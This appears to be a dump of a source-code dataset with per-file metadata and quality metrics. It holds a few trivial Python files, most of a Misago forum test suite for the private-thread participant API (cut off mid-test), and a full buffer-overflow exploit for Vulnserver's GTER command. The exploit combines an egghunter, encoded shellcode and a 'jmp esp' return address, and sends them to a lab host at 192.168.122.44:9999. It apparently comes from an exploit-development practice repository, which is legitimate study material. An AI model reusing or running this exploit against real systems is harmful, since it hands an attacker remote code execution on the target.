hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8ccd17b125bc0aaac11ea2968d5539348fadf74f | 28 | py | Python | pytools/__init__.py | tobyqin/pytools | b60acbd554865c4c593b16f8f81b0b800b482701 | [
"MIT"
] | null | null | null | pytools/__init__.py | tobyqin/pytools | b60acbd554865c4c593b16f8f81b0b800b482701 | [
"MIT"
] | null | null | null | pytools/__init__.py | tobyqin/pytools | b60acbd554865c4c593b16f8f81b0b800b482701 | [
"MIT"
] | null | null | null | def get_hostname():
pass | 14 | 19 | 0.678571 | 4 | 28 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 28 | 2 | 20 | 14 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
8cd62aff387d24011204f56c344cede45968390c | 35 | py | Python | carbone_sdk/__init__.py | Ideolys/carbone-sdk-python | 7dff1e56912694a5989a5f114e707d8653d2c85a | [
"Apache-2.0"
] | 2 | 2020-07-28T08:57:11.000Z | 2021-03-25T11:53:37.000Z | carbone_sdk/__init__.py | Ideolys/carbone-sdk-python | 7dff1e56912694a5989a5f114e707d8653d2c85a | [
"Apache-2.0"
] | 3 | 2020-09-12T14:35:26.000Z | 2021-04-12T15:03:21.000Z | carbone_sdk/__init__.py | carboneio/carbone-sdk-python | 7dff1e56912694a5989a5f114e707d8653d2c85a | [
"Apache-2.0"
] | 1 | 2020-12-04T12:45:38.000Z | 2020-12-04T12:45:38.000Z | from .carbone_sdk import CarboneSDK | 35 | 35 | 0.885714 | 5 | 35 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 35 | 1 | 35 | 35 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8cdcb65eb23bd46d85fa8b377627c6185859e420 | 13 | py | Python | src/test/data/pa3/AdditionalTestCase/UnitTest/Comparison_GE_True_GT.py | Leo-Enrique-Wu/chocopy_compiler_code_generation | 4606be0531b3de77411572aae98f73169f46b3b9 | [
"BSD-2-Clause"
] | null | null | null | src/test/data/pa3/AdditionalTestCase/UnitTest/Comparison_GE_True_GT.py | Leo-Enrique-Wu/chocopy_compiler_code_generation | 4606be0531b3de77411572aae98f73169f46b3b9 | [
"BSD-2-Clause"
] | null | null | null | src/test/data/pa3/AdditionalTestCase/UnitTest/Comparison_GE_True_GT.py | Leo-Enrique-Wu/chocopy_compiler_code_generation | 4606be0531b3de77411572aae98f73169f46b3b9 | [
"BSD-2-Clause"
] | null | null | null | print(2 >= 1) | 13 | 13 | 0.538462 | 3 | 13 | 2.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 0.153846 | 13 | 1 | 13 | 13 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
506c0f243fd9ffbe2a2ec44535d0742f23988850 | 2,411 | py | Python | 3-egghunters/vulnserver-gter/exploit.py | anvbis/windows-exp | 309eba877737a21c88cd2e4aa3bed7741560b53c | [
"MIT"
] | null | null | null | 3-egghunters/vulnserver-gter/exploit.py | anvbis/windows-exp | 309eba877737a21c88cd2e4aa3bed7741560b53c | [
"MIT"
] | null | null | null | 3-egghunters/vulnserver-gter/exploit.py | anvbis/windows-exp | 309eba877737a21c88cd2e4aa3bed7741560b53c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from pwn import *
pad = b'\x41' * 147
# 0x625011af: jmp esp ;
ret = p32(0x625011af)
egghunter = asm('''
loop_inc_page:
or dx, 0x0fff
loop_inc_one:
inc edx
push edx
push 0x2
pop eax
int 0x2e
cmp al, 0x5
pop edx
je loop_inc_page
mov eax, 0x74303077
mov edi, edx
scasd
jnz loop_inc_one
scasd
jnz loop_inc_one
jmp edi
''')
buf = b"w00tw00t"
buf += b"\xb8\x1c\x39\x42\xec\xd9\xec\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x42\x12\x83\xea\xfc\x03\x5e\x37\xa0"
buf += b"\x19\xa2\xaf\xa6\xe2\x5a\x30\xc7\x6b\xbf\x01\xc7\x08"
buf += b"\xb4\x32\xf7\x5b\x98\xbe\x7c\x09\x08\x34\xf0\x86\x3f"
buf += b"\xfd\xbf\xf0\x0e\xfe\xec\xc1\x11\x7c\xef\x15\xf1\xbd"
buf += b"\x20\x68\xf0\xfa\x5d\x81\xa0\x53\x29\x34\x54\xd7\x67"
buf += b"\x85\xdf\xab\x66\x8d\x3c\x7b\x88\xbc\x93\xf7\xd3\x1e"
buf += b"\x12\xdb\x6f\x17\x0c\x38\x55\xe1\xa7\x8a\x21\xf0\x61"
buf += b"\xc3\xca\x5f\x4c\xeb\x38\xa1\x89\xcc\xa2\xd4\xe3\x2e"
buf += b"\x5e\xef\x30\x4c\x84\x7a\xa2\xf6\x4f\xdc\x0e\x06\x83"
buf += b"\xbb\xc5\x04\x68\xcf\x81\x08\x6f\x1c\xba\x35\xe4\xa3"
buf += b"\x6c\xbc\xbe\x87\xa8\xe4\x65\xa9\xe9\x40\xcb\xd6\xe9"
buf += b"\x2a\xb4\x72\x62\xc6\xa1\x0e\x29\x8f\x06\x23\xd1\x4f"
buf += b"\x01\x34\xa2\x7d\x8e\xee\x2c\xce\x47\x29\xab\x31\x72"
buf += b"\x8d\x23\xcc\x7d\xee\x6a\x0b\x29\xbe\x04\xba\x52\x55"
buf += b"\xd4\x43\x87\xfa\x84\xeb\x78\xbb\x74\x4c\x29\x53\x9e"
buf += b"\x43\x16\x43\xa1\x89\x3f\xee\x58\x5a\x80\x47\x18\x7d"
buf += b"\x68\x9a\xdc\x90\x35\x13\x3a\xf8\xd5\x75\x95\x95\x4c"
buf += b"\xdc\x6d\x07\x90\xca\x08\x07\x1a\xf9\xed\xc6\xeb\x74"
buf += b"\xfd\xbf\x1b\xc3\x5f\x69\x23\xf9\xf7\xf5\xb6\x66\x07"
buf += b"\x73\xab\x30\x50\xd4\x1d\x49\x34\xc8\x04\xe3\x2a\x11"
buf += b"\xd0\xcc\xee\xce\x21\xd2\xef\x83\x1e\xf0\xff\x5d\x9e"
buf += b"\xbc\xab\x31\xc9\x6a\x05\xf4\xa3\xdc\xff\xae\x18\xb7"
buf += b"\x97\x37\x53\x08\xe1\x37\xbe\xfe\x0d\x89\x17\x47\x32"
buf += b"\x26\xf0\x4f\x4b\x5a\x60\xaf\x86\xde\x90\xfa\x8a\x77"
buf += b"\x39\xa3\x5f\xca\x24\x54\x8a\x09\x51\xd7\x3e\xf2\xa6"
buf += b"\xc7\x4b\xf7\xe3\x4f\xa0\x85\x7c\x3a\xc6\x3a\x7c\x6f"
pad = b'\x90' * 32 + egghunter + b'\x41' * (147-32-len(egghunter))
payload = b'GTER /.:/%s' % (pad + ret + b'\xE9\x68\xFF\xFF\xFF')
with remote('192.168.122.44', 9999) as r:
r.writeline(b'TRUN %s' % buf)
with remote('192.168.122.44', 9999) as r:
r.writeline(payload)
| 34.442857 | 66 | 0.659477 | 523 | 2,411 | 3.021033 | 0.458891 | 0.070886 | 0.018987 | 0.018987 | 0.070886 | 0.048101 | 0.048101 | 0.048101 | 0.048101 | 0.048101 | 0 | 0.236854 | 0.108669 | 2,411 | 69 | 67 | 34.942029 | 0.498371 | 0.017835 | 0 | 0.105263 | 0 | 0.473684 | 0.7463 | 0.593658 | 0 | 1 | 0.015222 | 0 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.017544 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5075a3d7314060327161c84be8ff62a62aba4c36 | 28,302 | py | Python | misago/threads/tests/test_privatethread_patch_api.py | HenryChenV/iJiangNan | 68f156d264014939f0302222e16e3125119dd3e3 | [
"MIT"
] | 1 | 2017-07-25T03:04:36.000Z | 2017-07-25T03:04:36.000Z | misago/threads/tests/test_privatethread_patch_api.py | HenryChenV/iJiangNan | 68f156d264014939f0302222e16e3125119dd3e3 | [
"MIT"
] | null | null | null | misago/threads/tests/test_privatethread_patch_api.py | HenryChenV/iJiangNan | 68f156d264014939f0302222e16e3125119dd3e3 | [
"MIT"
] | null | null | null | import json
from django.contrib.auth import get_user_model
from django.core import mail
from misago.acl.testutils import override_acl
from misago.threads import testutils
from misago.threads.models import Thread, ThreadParticipant
from .test_privatethreads import PrivateThreadsTestCase
UserModel = get_user_model()
class PrivateThreadPatchApiTestCase(PrivateThreadsTestCase):
def setUp(self):
super(PrivateThreadPatchApiTestCase, self).setUp()
self.thread = testutils.post_thread(self.category, poster=self.user)
self.api_link = self.thread.get_api_url()
self.other_user = UserModel.objects.create_user(
'BobBoberson', 'bob@boberson.com', 'pass123'
)
def patch(self, api_link, ops):
return self.client.patch(api_link, json.dumps(ops), content_type="application/json")
class PrivateThreadAddParticipantApiTests(PrivateThreadPatchApiTestCase):
def test_add_participant_not_owner(self):
"""non-owner can't add participant"""
ThreadParticipant.objects.add_participants(self.thread, [self.user])
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.user.username,
},
]
)
self.assertContains(
response, "be thread owner to add new participants to it", status_code=400
)
def test_add_empty_username(self):
"""path validates username"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': '',
},
]
)
self.assertContains(
response, "You have to enter new participant's username.", status_code=400
)
def test_add_nonexistant_user(self):
"""can't user two times"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': 'InvalidUser',
},
]
)
self.assertContains(response, "No user with such name exists.", status_code=400)
def test_add_already_participant(self):
"""can't add user that is already participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.user.username,
},
]
)
self.assertContains(response, "This user is already thread participant", status_code=400)
def test_add_blocking_user(self):
"""can't add user that is already participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
self.other_user.blocks.add(self.user)
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
self.assertContains(response, "BobBoberson is blocking you.", status_code=400)
def test_add_no_perm_user(self):
"""can't add user that has no permission to use private threads"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
override_acl(self.other_user, {'can_use_private_threads': 0})
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
self.assertContains(response, "BobBoberson can't participate", status_code=400)
def test_add_too_many_users(self):
"""can't add user that is already participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
for i in range(self.user.acl_cache['max_private_thread_participants']):
user = UserModel.objects.create_user(
'User{}'.format(i), 'user{}@example.com'.format(i), 'Pass.123'
)
ThreadParticipant.objects.add_participants(self.thread, [user])
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
self.assertContains(
response, "You can't add any more new users to this thread.", status_code=400
)
def test_add_user_closed_thread(self):
"""adding user to closed thread fails for non-moderator"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
self.thread.is_closed = True
self.thread.save()
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
self.assertContains(
response, "Only moderators can add participants to closed threads.", status_code=400
)
def test_add_user(self):
"""adding user to thread add user to thread as participant, sets event and emails him"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
# event was set on thread
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'added_participant')
# notification about new private thread was sent to other user
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[-1]
self.assertIn(self.user.username, email.subject)
self.assertIn(self.thread.title, email.subject)
def test_add_user_to_other_user_thread_moderator(self):
"""moderators can add users to other users threads"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
self.thread.has_reported_posts = True
self.thread.save()
override_acl(self.user, {'can_moderate_private_threads': 1})
self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.user.username,
},
]
)
# event was set on thread
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'entered_thread')
# notification about new private thread wasn't send because we invited ourselves
self.assertEqual(len(mail.outbox), 0)
def test_add_user_to_closed_moderator(self):
"""moderators can add users to closed threads"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
self.thread.is_closed = True
self.thread.save()
override_acl(self.user, {'can_moderate_private_threads': 1})
self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
# event was set on thread
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'added_participant')
# notification about new private thread was sent to other user
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[-1]
self.assertIn(self.user.username, email.subject)
self.assertIn(self.thread.title, email.subject)
class PrivateThreadRemoveParticipantApiTests(PrivateThreadPatchApiTestCase):
def test_remove_empty(self):
"""api handles empty user id"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': 'string',
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_remove_invalid(self):
"""api validates user id type"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': 'string',
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_remove_nonexistant(self):
"""removed user has to be participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.other_user.pk,
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_remove_not_owner(self):
"""api validates if user trying to remove other user is an owner"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.other_user.pk,
},
]
)
self.assertContains(
response, "be thread owner to remove participants from it", status_code=400
)
def test_owner_remove_user_closed_thread(self):
"""api disallows owner to remove other user from closed thread"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
self.thread.is_closed = True
self.thread.save()
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.other_user.pk,
},
]
)
self.assertContains(
response, "moderators can remove participants from closed threads", status_code=400
)
def test_user_leave_thread(self):
"""api allows user to remove himself from thread"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
self.user.subscription_set.create(
category=self.category,
thread=self.thread,
)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists
self.assertTrue(Thread.objects.get(pk=self.thread.pk))
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'participant_left')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 1)
self.assertEqual(self.thread.participants.filter(pk=self.user.pk).count(), 0)
# thread was removed from user subscriptions
self.assertEqual(self.user.subscription_set.count(), 0)
def test_user_leave_closed_thread(self):
"""api allows user to remove himself from closed thread"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
self.thread.is_closed = True
self.thread.save()
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists
self.assertTrue(Thread.objects.get(pk=self.thread.pk))
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'participant_left')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 1)
self.assertEqual(self.thread.participants.filter(pk=self.user.pk).count(), 0)
def test_moderator_remove_user(self):
"""api allows moderator to remove other user"""
removed_user = UserModel.objects.create_user('Vigilante', 'test@test.com', 'pass123')
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user, removed_user])
override_acl(self.user, {'can_moderate_private_threads': True})
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': removed_user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists
self.assertTrue(Thread.objects.get(pk=self.thread.pk))
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'participant_removed')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=removed_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 2)
self.assertEqual(self.thread.participants.filter(pk=removed_user.pk).count(), 0)
def test_owner_remove_user(self):
"""api allows owner to remove other user"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.other_user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists
self.assertTrue(Thread.objects.get(pk=self.thread.pk))
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'participant_removed')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 1)
self.assertEqual(self.thread.participants.filter(pk=self.other_user.pk).count(), 0)
def test_owner_leave_thread(self):
"""api allows owner to remove hisemf from thread, causing thread to close"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists and is closed
self.assertTrue(Thread.objects.get(pk=self.thread.pk).is_closed)
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'owner_left')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 1)
self.assertEqual(self.thread.participants.filter(pk=self.user.pk).count(), 0)
def test_last_user_leave_thread(self):
"""api allows last user leave thread, causing thread to delete"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertTrue(response.json()['deleted'])
# thread is gone
with self.assertRaises(Thread.DoesNotExist):
Thread.objects.get(pk=self.thread.pk)
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
class PrivateThreadTakeOverApiTests(PrivateThreadPatchApiTestCase):
def test_empty_user_id(self):
"""api handles empty user id"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': '',
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_invalid_user_id(self):
"""api handles invalid user id"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': 'dsadsa',
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_nonexistant_user_id(self):
"""api handles nonexistant user id"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.other_user.pk,
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_no_permission(self):
"""non-moderator/owner can't change owner"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.user.pk,
},
]
)
self.assertContains(
response, "thread owner and moderators can change threads owners", status_code=400
)
def test_no_change(self):
"""api validates that new owner id is same as current owner"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.user.pk,
},
]
)
self.assertContains(response, "This user already is thread owner.", status_code=400)
def test_change_closed_thread_owner(self):
"""non-moderator can't change owner in closed thread"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
self.thread.is_closed = True
self.thread.save()
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.other_user.pk,
},
]
)
self.assertContains(
response, "Only moderators can change closed threads owners.", status_code=400
)
def test_owner_change_thread_owner(self):
"""owner can pass thread ownership to other participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.other_user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
# valid users were flagged for sync
self.assertFalse(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# ownership was transfered
self.assertEqual(self.thread.participants.count(), 2)
self.assertTrue(ThreadParticipant.objects.get(user=self.other_user).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.user).is_owner)
# change was recorded in event
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertTrue(event.event_type, 'changed_owner')
def test_moderator_change_owner(self):
"""moderator can change thread owner to other user"""
new_owner = UserModel.objects.create_user('NewOwner', 'new@owner.com', 'pass123')
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user, new_owner])
override_acl(self.user, {'can_moderate_private_threads': 1})
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': new_owner.pk,
},
]
)
self.assertEqual(response.status_code, 200)
# valid users were flagged for sync
